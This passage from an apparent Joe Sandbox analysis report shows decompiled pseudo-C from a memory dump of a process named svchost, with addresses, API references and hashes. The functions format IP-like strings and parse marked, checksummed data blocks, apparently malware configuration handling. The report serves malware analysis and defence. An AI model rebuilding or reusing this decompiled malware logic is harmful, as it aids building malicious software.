                                                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                                                                                                                    				intOrPtr* _v84;
                                                                                                                                                                                                                                                    				intOrPtr _v88;
                                                                                                                                                                                                                                                    				intOrPtr _v92;
                                                                                                                                                                                                                                                    				intOrPtr _t74;
                                                                                                                                                                                                                                                    				intOrPtr _t83;
                                                                                                                                                                                                                                                    				intOrPtr _t99;
                                                                                                                                                                                                                                                    				void* _t101;
                                                                                                                                                                                                                                                    				void* _t108;
                                                                                                                                                                                                                                                    				void* _t156;
                                                                                                                                                                                                                                                    				void* _t157;
                                                                                                                                                                                                                                                    				signed int _t158;
                                                                                                                                                                                                                                                    				void* _t159;
                                                                                                                                                                                                                                                    				void* _t163;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t157 = __esi;
                                                                                                                                                                                                                                                    				_t156 = __edi;
                                                                                                                                                                                                                                                    				_t108 = __ebx;
                                                                                                                                                                                                                                                    				_v16 =  *0x429024 ^ _t158;
                                                                                                                                                                                                                                                    				_v80 = __ecx;
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                    					_v36 =  *0x426fa8;
                                                                                                                                                                                                                                                    					_v32 =  *0x426fac;
                                                                                                                                                                                                                                                    					_v28 =  *0x426fb0;
                                                                                                                                                                                                                                                    					_v24 =  *0x426fb4;
                                                                                                                                                                                                                                                    					_v20 =  *0x426fb8;
                                                                                                                                                                                                                                                    					_t74 = E04020CE0(8);
                                                                                                                                                                                                                                                    					_t159 = _t159 + 4;
                                                                                                                                                                                                                                                    					_v52 = _t74;
                                                                                                                                                                                                                                                    					if(_v52 == 0) {
                                                                                                                                                                                                                                                    						_v84 = 0;
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_v84 = E0401F4E0(_v52);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_v12 = _v84;
                                                                                                                                                                                                                                                    					E0401FC90(_t108, _v12, _t156, _t157,  &_v36, 0x10);
                                                                                                                                                                                                                                                    					if((E04015C60(_t108, _v80, _v84, _v12) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    						_v44 = 0;
                                                                                                                                                                                                                                                    						_t83 = E0401BCB0(_t156, 4,  *_v12,  &_v44);
                                                                                                                                                                                                                                                    						_t159 = _t159 + 0xc;
                                                                                                                                                                                                                                                    						_v40 = _t83;
                                                                                                                                                                                                                                                    						if(_v40 > 0) {
                                                                                                                                                                                                                                                    							_v56 = E04020CE0(0x11);
                                                                                                                                                                                                                                                    							_v48 = _v56;
                                                                                                                                                                                                                                                    							E04007010(_t156, _v48, 0, 0x11);
                                                                                                                                                                                                                                                    							 *0x4251f8(_v48, 0x10, 0x426fbc,  *( *_v44 + 4) & 0xff, ( *( *_v44 + 4) & 0xffff) >> 0x00000008 & 0xff,  *( *_v44 + 4) >> 0x00000010 & 0xff, ( *( *_v44 + 4) >> 0x00000010 & 0xffff) >> 0x00000008 & 0xff);
                                                                                                                                                                                                                                                    							_t99 = E04020CE0(8);
                                                                                                                                                                                                                                                    							_t163 = _t159 + 0x30;
                                                                                                                                                                                                                                                    							_v60 = _t99;
                                                                                                                                                                                                                                                    							if(_v60 == 0) {
                                                                                                                                                                                                                                                    								_v88 = 0;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v88 = E0401F4E0(_v60);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v8 = _v88;
                                                                                                                                                                                                                                                    							_t101 = E040070A0(_v48);
                                                                                                                                                                                                                                                    							_t159 = _t163 + 4;
                                                                                                                                                                                                                                                    							E0401FC90(_t108, _v8, _t156, _t157, _v48, _t101);
                                                                                                                                                                                                                                                    							if(_v48 != 0) {
                                                                                                                                                                                                                                                    								_v64 = _v48;
                                                                                                                                                                                                                                                    								E04020CC0(_v64);
                                                                                                                                                                                                                                                    								_t159 = _t159 + 4;
                                                                                                                                                                                                                                                    								_v48 = 0x666;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							if(_v44 != 0) {
                                                                                                                                                                                                                                                    								_v68 = _v44;
                                                                                                                                                                                                                                                    								E04020CC0(_v68);
                                                                                                                                                                                                                                                    								_t159 = _t159 + 4;
                                                                                                                                                                                                                                                    								_v44 = 0x666;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                                                                                                                    						_v76 = _v12;
                                                                                                                                                                                                                                                    						_v72 = _v76;
                                                                                                                                                                                                                                                    						if(_v72 == 0) {
                                                                                                                                                                                                                                                    							_v92 = 0;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_v92 = E04004EA0(_v72, 1);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v12 = 0x666;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				} while (0 != 0);
                                                                                                                                                                                                                                                    				return E04006C8C(_v8, _t108, _v16 ^ _t158, 0, _t156, _t157);
                                                                                                                                                                                                                                                    			}



































                                                                                                                                                                                                                                                    0x04012470
                                                                                                                                                                                                                                                    0x04012470
                                                                                                                                                                                                                                                    0x04012470
                                                                                                                                                                                                                                                    0x0401247d
                                                                                                                                                                                                                                                    0x04012480
                                                                                                                                                                                                                                                    0x04012483
                                                                                                                                                                                                                                                    0x0401248a
                                                                                                                                                                                                                                                    0x0401248f
                                                                                                                                                                                                                                                    0x04012498
                                                                                                                                                                                                                                                    0x040124a1
                                                                                                                                                                                                                                                    0x040124a9
                                                                                                                                                                                                                                                    0x040124b2
                                                                                                                                                                                                                                                    0x040124b7
                                                                                                                                                                                                                                                    0x040124bc
                                                                                                                                                                                                                                                    0x040124bf
                                                                                                                                                                                                                                                    0x040124c6
                                                                                                                                                                                                                                                    0x040124d5
                                                                                                                                                                                                                                                    0x040124c8
                                                                                                                                                                                                                                                    0x040124d0
                                                                                                                                                                                                                                                    0x040124d0
                                                                                                                                                                                                                                                    0x040124df
                                                                                                                                                                                                                                                    0x040124eb
                                                                                                                                                                                                                                                    0x04012501
                                                                                                                                                                                                                                                    0x04012507
                                                                                                                                                                                                                                                    0x0401251a
                                                                                                                                                                                                                                                    0x0401251f
                                                                                                                                                                                                                                                    0x04012522
                                                                                                                                                                                                                                                    0x04012529
                                                                                                                                                                                                                                                    0x04012539
                                                                                                                                                                                                                                                    0x0401253f
                                                                                                                                                                                                                                                    0x0401254a
                                                                                                                                                                                                                                                    0x040125d3
                                                                                                                                                                                                                                                    0x040125de
                                                                                                                                                                                                                                                    0x040125e3
                                                                                                                                                                                                                                                    0x040125e6
                                                                                                                                                                                                                                                    0x040125ed
                                                                                                                                                                                                                                                    0x040125fc
                                                                                                                                                                                                                                                    0x040125ef
                                                                                                                                                                                                                                                    0x040125f7
                                                                                                                                                                                                                                                    0x040125f7
                                                                                                                                                                                                                                                    0x04012606
                                                                                                                                                                                                                                                    0x0401260d
                                                                                                                                                                                                                                                    0x04012612
                                                                                                                                                                                                                                                    0x0401261d
                                                                                                                                                                                                                                                    0x04012626
                                                                                                                                                                                                                                                    0x0401262b
                                                                                                                                                                                                                                                    0x04012632
                                                                                                                                                                                                                                                    0x04012637
                                                                                                                                                                                                                                                    0x0401263a
                                                                                                                                                                                                                                                    0x0401263a
                                                                                                                                                                                                                                                    0x04012645
                                                                                                                                                                                                                                                    0x0401264a
                                                                                                                                                                                                                                                    0x04012651
                                                                                                                                                                                                                                                    0x04012656
                                                                                                                                                                                                                                                    0x04012659
                                                                                                                                                                                                                                                    0x04012659
                                                                                                                                                                                                                                                    0x04012645
                                                                                                                                                                                                                                                    0x04012529
                                                                                                                                                                                                                                                    0x04012664
                                                                                                                                                                                                                                                    0x04012669
                                                                                                                                                                                                                                                    0x0401266f
                                                                                                                                                                                                                                                    0x04012676
                                                                                                                                                                                                                                                    0x04012687
                                                                                                                                                                                                                                                    0x04012678
                                                                                                                                                                                                                                                    0x04012682
                                                                                                                                                                                                                                                    0x04012682
                                                                                                                                                                                                                                                    0x0401268e
                                                                                                                                                                                                                                                    0x0401268e
                                                                                                                                                                                                                                                    0x04012695
                                                                                                                                                                                                                                                    0x040126ad

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 040124CB
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 0401254A
                                                                                                                                                                                                                                                    • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 040125F2
                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 0401260D
                                                                                                                                                                                                                                                    • codecvt.LIBCPMTD ref: 0401267D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Iterator_baseIterator_base::_std::_$_memset_strlencodecvt
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2459447590-0
                                                                                                                                                                                                                                                    • Opcode ID: e9ae77fbe599c57f9ed2e64cca4674112824ea2fac37f94927e6576c1164366d
                                                                                                                                                                                                                                                    • Instruction ID: 2d0a0b2a9c0e8f4d9cfb9b2fe2ef08dc32606c7a33a305a0369b3e2b17122581
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9ae77fbe599c57f9ed2e64cca4674112824ea2fac37f94927e6576c1164366d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 837138B0E002199FEB14DFA8D984BEDBBB1FF88318F148169E405BB390D775A944CB54
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                                                                                                                                    			E040135C0(void* __ebx, intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				signed int _v9;
                                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                                    				intOrPtr* _v20;
                                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                                                    				intOrPtr* _v52;
                                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                                    				intOrPtr* _v60;
                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                                    				intOrPtr _t81;
                                                                                                                                                                                                                                                    				intOrPtr _t92;
                                                                                                                                                                                                                                                    				intOrPtr _t95;
                                                                                                                                                                                                                                                    				void* _t98;
                                                                                                                                                                                                                                                    				void* _t128;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t98 = __ebx;
                                                                                                                                                                                                                                                    				_v52 = __ecx;
                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                    				_v9 = 0;
                                                                                                                                                                                                                                                    				while(_a4 != 0) {
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)( *_v52 + 0x2c)) >= 1) {
                                                                                                                                                                                                                                                    						_v16 = 0;
                                                                                                                                                                                                                                                    						while(_v16 <  *((intOrPtr*)( *_v52 + 0x2c))) {
                                                                                                                                                                                                                                                    							_t81 = E04020CE0(8);
                                                                                                                                                                                                                                                    							_t128 = _t128 + 4;
                                                                                                                                                                                                                                                    							_v28 = _t81;
                                                                                                                                                                                                                                                    							if(_v28 == 0) {
                                                                                                                                                                                                                                                    								_v60 = 0;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v60 = E0401F4E0(_v28);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v20 = _v60;
                                                                                                                                                                                                                                                    							E0401F9F0(_t98, _v20, _a4,  *((intOrPtr*)(_a4 + 0x1c)),  *((intOrPtr*)(_a4 + 0x20)), 0);
                                                                                                                                                                                                                                                    							 *((intOrPtr*)(_v52 + 0x10)) = _v16;
                                                                                                                                                                                                                                                    							if((E04015C60(_t98, _v52, _v16, _v20) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    								if(_v8 == 0) {
                                                                                                                                                                                                                                                    									_t92 = E04020CE0(8);
                                                                                                                                                                                                                                                    									_t128 = _t128 + 4;
                                                                                                                                                                                                                                                    									_v32 = _t92;
                                                                                                                                                                                                                                                    									if(_v32 == 0) {
                                                                                                                                                                                                                                                    										_v64 = 0;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										_v64 = E0401F4E0(_v32);
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    									_v8 = _v64;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								E0401F9F0(_t98, _v8, _v20,  *_v20,  *((intOrPtr*)(_v20 + 4)), 0);
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v9 = 1;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							if(_v20 != 0) {
                                                                                                                                                                                                                                                    								_v40 = _v20;
                                                                                                                                                                                                                                                    								_v36 = _v40;
                                                                                                                                                                                                                                                    								if(_v36 == 0) {
                                                                                                                                                                                                                                                    									_v68 = 0;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_v68 = E04004EA0(_v36, 1);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_v20 = 0x666;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							if((_v9 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    								_v16 = _v16 + 1;
                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							goto L30;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t95 = E04020CE0(8);
                                                                                                                                                                                                                                                    						_t128 = _t128 + 4;
                                                                                                                                                                                                                                                    						_v24 = _t95;
                                                                                                                                                                                                                                                    						if(_v24 == 0) {
                                                                                                                                                                                                                                                    							_v56 = 0;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							_v56 = E0401F4E0(_v24);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v8 = _v56;
                                                                                                                                                                                                                                                    						 *((intOrPtr*)(_v8 + 4)) = 0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L30:
                                                                                                                                                                                                                                                    					if((_v9 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                    						if(_v8 != 0) {
                                                                                                                                                                                                                                                    							_v48 = _v8;
                                                                                                                                                                                                                                                    							_v44 = _v48;
                                                                                                                                                                                                                                                    							if(_v44 == 0) {
                                                                                                                                                                                                                                                    								_v72 = 0;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_v72 = E04004EA0(_v44, 1);
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_v8 = 0x666;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_v8 = 0;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if(0 != 0) {
                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					L38:
                                                                                                                                                                                                                                                    					return _v8;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				goto L38;
                                                                                                                                                                                                                                                    			}

























                                                                                                                                                                                                                                                    0x040135c0
                                                                                                                                                                                                                                                    0x040135c6
                                                                                                                                                                                                                                                    0x040135c9
                                                                                                                                                                                                                                                    0x040135d0
                                                                                                                                                                                                                                                    0x040135d4
                                                                                                                                                                                                                                                    0x040135e8
                                                                                                                                                                                                                                                    0x04013626
                                                                                                                                                                                                                                                    0x04013638
                                                                                                                                                                                                                                                    0x0401364b
                                                                                                                                                                                                                                                    0x04013650
                                                                                                                                                                                                                                                    0x04013653
                                                                                                                                                                                                                                                    0x0401365a
                                                                                                                                                                                                                                                    0x04013669
                                                                                                                                                                                                                                                    0x0401365c
                                                                                                                                                                                                                                                    0x04013664
                                                                                                                                                                                                                                                    0x04013664
                                                                                                                                                                                                                                                    0x04013673
                                                                                                                                                                                                                                                    0x04013689
                                                                                                                                                                                                                                                    0x04013694
                                                                                                                                                                                                                                                    0x040136a8
                                                                                                                                                                                                                                                    0x040136b4
                                                                                                                                                                                                                                                    0x040136b8
                                                                                                                                                                                                                                                    0x040136bd
                                                                                                                                                                                                                                                    0x040136c0
                                                                                                                                                                                                                                                    0x040136c7
                                                                                                                                                                                                                                                    0x040136d6
                                                                                                                                                                                                                                                    0x040136c9
                                                                                                                                                                                                                                                    0x040136d1
                                                                                                                                                                                                                                                    0x040136d1
                                                                                                                                                                                                                                                    0x040136e0
                                                                                                                                                                                                                                                    0x040136e0
                                                                                                                                                                                                                                                    0x040136f5
                                                                                                                                                                                                                                                    0x040136aa
                                                                                                                                                                                                                                                    0x040136aa
                                                                                                                                                                                                                                                    0x040136aa
                                                                                                                                                                                                                                                    0x040136fe
                                                                                                                                                                                                                                                    0x04013703
                                                                                                                                                                                                                                                    0x04013709
                                                                                                                                                                                                                                                    0x04013710
                                                                                                                                                                                                                                                    0x04013721
                                                                                                                                                                                                                                                    0x04013712
                                                                                                                                                                                                                                                    0x0401371c
                                                                                                                                                                                                                                                    0x0401371c
                                                                                                                                                                                                                                                    0x04013728
                                                                                                                                                                                                                                                    0x04013728
                                                                                                                                                                                                                                                    0x04013735
                                                                                                                                                                                                                                                    0x04013635
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04013737
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x04013735
                                                                                                                                                                                                                                                    0x040135ea
                                                                                                                                                                                                                                                    0x040135ec
                                                                                                                                                                                                                                                    0x040135f1
                                                                                                                                                                                                                                                    0x040135f4
                                                                                                                                                                                                                                                    0x040135fb
                                                                                                                                                                                                                                                    0x0401360a
                                                                                                                                                                                                                                                    0x040135fd
                                                                                                                                                                                                                                                    0x04013605
                                                                                                                                                                                                                                                    0x04013605
                                                                                                                                                                                                                                                    0x04013614
                                                                                                                                                                                                                                                    0x0401361a
                                                                                                                                                                                                                                                    0x0401361a
                                                                                                                                                                                                                                                    0x0401373e
                                                                                                                                                                                                                                                    0x04013744
                                                                                                                                                                                                                                                    0x0401374a
                                                                                                                                                                                                                                                    0x0401374f
                                                                                                                                                                                                                                                    0x04013755
                                                                                                                                                                                                                                                    0x0401375c
                                                                                                                                                                                                                                                    0x0401376d
                                                                                                                                                                                                                                                    0x0401375e
                                                                                                                                                                                                                                                    0x04013768
                                                                                                                                                                                                                                                    0x04013768
                                                                                                                                                                                                                                                    0x04013774
                                                                                                                                                                                                                                                    0x04013774
                                                                                                                                                                                                                                                    0x0401377b
                                                                                                                                                                                                                                                    0x0401377b
                                                                                                                                                                                                                                                    0x04013784
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x0401378a
                                                                                                                                                                                                                                                    0x04013790
                                                                                                                                                                                                                                                    0x04013790
                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04013600
                                                                                                                                                                                                                                                    • codecvt.LIBCPMTD ref: 04013763
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.862471983.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.862471983.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Iterator_baseIterator_base::_codecvtstd::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3817610042-0
                                                                                                                                                                                                                                                    • Opcode ID: f1128d24d620c5156b89d421dd3da55f990c9896146a5d0fdb04f4f7fc45e4ab
                                                                                                                                                                                                                                                    • Instruction ID: 940426154ba22623eb4585301945e88a2baf8d43e6e943a63c159829dd530f10
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1128d24d620c5156b89d421dd3da55f990c9896146a5d0fdb04f4f7fc45e4ab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 355105B4E01219EFEB14DF94D594BEEBBB1BB48308F208169E8057B3A0D7756A44CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                                                                                                                    			E04026C40(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                                                                                    				char _v28;
                                                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                                                    				signed int _v37;
                                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                                    				intOrPtr* _v64;
                                                                                                                                                                                                                                                    				signed short* _v68;
                                                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                                                    				signed int _v84;
                                                                                                                                                                                                                                                    				intOrPtr _v88;
                                                                                                                                                                                                                                                    				char _v92;
                                                                                                                                                                                                                                                    				signed short* _v96;
                                                                                                                                                                                                                                                    				signed short* _v100;
                                                                                                                                                                                                                                                    				signed short* _v104;
                                                                                                                                                                                                                                                    				char _v108;
                                                                                                                                                                                                                                                    				intOrPtr _v112;
                                                                                                                                                                                                                                                    				signed short* _v116;
                                                                                                                                                                                                                                                    				intOrPtr _v120;
                                                                                                                                                                                                                                                    				signed short* _v124;
                                                                                                                                                                                                                                                    				signed int _v128;
                                                                                                                                                                                                                                                    				intOrPtr _v132;
                                                                                                                                                                                                                                                    				signed int _v136;
                                                                                                                                                                                                                                                    				signed int _v140;
                                                                                                                                                                                                                                                    				intOrPtr _v144;
                                                                                                                                                                                                                                                    				intOrPtr _v148;
                                                                                                                                                                                                                                                    				intOrPtr _t154;
                                                                                                                                                                                                                                                    				intOrPtr _t172;
                                                                                                                                                                                                                                                    				intOrPtr _t177;
                                                                                                                                                                                                                                                    				signed int _t183;
                                                                                                                                                                                                                                                    				void* _t187;
                                                                                                                                                                                                                                                    				intOrPtr _t191;
                                                                                                                                                                                                                                                    				intOrPtr _t195;
                                                                                                                                                                                                                                                    				signed short* _t201;
                                                                                                                                                                                                                                                    				void* _t204;
                                                                                                                                                                                                                                                    				intOrPtr _t205;
                                                                                                                                                                                                                                                    				void* _t210;
                                                                                                                                                                                                                                                    				void* _t268;
                                                                                                                                                                                                                                                    				void* _t269;
                                                                                                                                                                                                                                                    				signed int _t270;
                                                                                                                                                                                                                                                    				void* _t271;
                                                                                                                                                                                                                                                    				void* _t272;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t269 = __esi;
                                                                                                                                                                                                                                                    				_t268 = __edi;
                                                                                                                                                                                                                                                    				_t210 = __ebx;
                                                                                                                                                                                                                                                    				_v20 =  *0x429024 ^ _t270;
                                                                                                                                                                                                                                                    				_v28 =  *0x42741c;
                                                                                                                                                                                                                                                    				_v24 =  *0x427420;
                                                                                                                                                                                                                                                    				_t246 =  *0x427424;
                                                                                                                                                                                                                                                    				_v16 =  *0x427424;
                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                    				_t154 = E04020CE0(8);
                                                                                                                                                                                                                                                    				_t272 = _t271 + 4;
                                                                                                                                                                                                                                                    				_v112 = _t154;
                                                                                                                                                                                                                                                    				if(_v112 == 0) {
                                                                                                                                                                                                                                                    					_v140 = 0;
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_v140 = E0401F4E0(_v112);
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_v8 = _v140;
                                                                                                                                                                                                                                                    				while(_a4 != 0 && _a8 >= 4) {
                                                                                                                                                                                                                                                    					_t246 = _a4;
                                                                                                                                                                                                                                                    					E0401F9F0(_t210, _v8, _a4, _a4, _a8, 0);
                                                                                                                                                                                                                                                    					_v36 = 0;
                                                                                                                                                                                                                                                    					_v32 = 0;
                                                                                                                                                                                                                                                    					_v37 = 0;
                                                                                                                                                                                                                                                    					while((_v37 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    						_t246 =  &_v28;
                                                                                                                                                                                                                                                    						_v36 = E0401F370(_v8,  &_v28, 4, _v36);
                                                                                                                                                                                                                                                    						if(_v36 >= 0) {
                                                                                                                                                                                                                                                    							_v36 = _v36 + 4;
                                                                                                                                                                                                                                                    							_t246 =  &_v16;
                                                                                                                                                                                                                                                    							_v32 = E0401F370(_v8,  &_v16, 3, _v36);
                                                                                                                                                                                                                                                    							if(_v32 >= 0) {
                                                                                                                                                                                                                                                    								_v44 = _v32 - _v36;
                                                                                                                                                                                                                                                    								_t246 = _v36;
                                                                                                                                                                                                                                                    								_v52 = E0401F410(_v8,  &_v28, 4, _v36, _v44);
                                                                                                                                                                                                                                                    								if(_v52 <= 0xffffffff) {
                                                                                                                                                                                                                                                    									_v56 = 0;
                                                                                                                                                                                                                                                    									_t172 = E0401EAF0(_t268, _a4 + _v36, _v32 - _v36,  &_v56);
                                                                                                                                                                                                                                                    									_t272 = _t272 + 0xc;
                                                                                                                                                                                                                                                    									_v48 = _t172;
                                                                                                                                                                                                                                                    									if(_v48 <= 4 || _v56 == 0) {
                                                                                                                                                                                                                                                    										L47:
                                                                                                                                                                                                                                                    										_t246 = _v37 & 0x000000ff;
                                                                                                                                                                                                                                                    										if((_v37 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                    											_v36 = _v32 + 3;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                                    										_t177 = E040223A0(_v56 + 4, _v48 - 4);
                                                                                                                                                                                                                                                    										_t272 = _t272 + 8;
                                                                                                                                                                                                                                                    										_v60 = _t177;
                                                                                                                                                                                                                                                    										if(_v60 !=  *_v56) {
                                                                                                                                                                                                                                                    											L45:
                                                                                                                                                                                                                                                    											if(_v56 != 0) {
                                                                                                                                                                                                                                                    												_v128 = _v56;
                                                                                                                                                                                                                                                    												E04020CC0(_v128);
                                                                                                                                                                                                                                                    												_t272 = _t272 + 4;
                                                                                                                                                                                                                                                    												_v56 = 0x666;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											goto L47;
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    										_v64 = _v56 + 4;
                                                                                                                                                                                                                                                    										_t229 = _v48 - 4;
                                                                                                                                                                                                                                                    										_v68 = _v48 - 4;
                                                                                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                                                                                    											L19:
                                                                                                                                                                                                                                                    											_t183 = E04021D10(_t229,  *_v64);
                                                                                                                                                                                                                                                    											_t272 = _t272 + 4;
                                                                                                                                                                                                                                                    											_v84 = _t183;
                                                                                                                                                                                                                                                    											if((_v84 & 0x0000ffff) < 1 || (_v84 & 0x0000ffff) > 0x7d00) {
                                                                                                                                                                                                                                                    												break;
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    											_v80 = _v84 & 0x0000ffff;
                                                                                                                                                                                                                                                    											_t187 = E040221A0(_v64 + 8,  &_v80, _v64 + 4, 4);
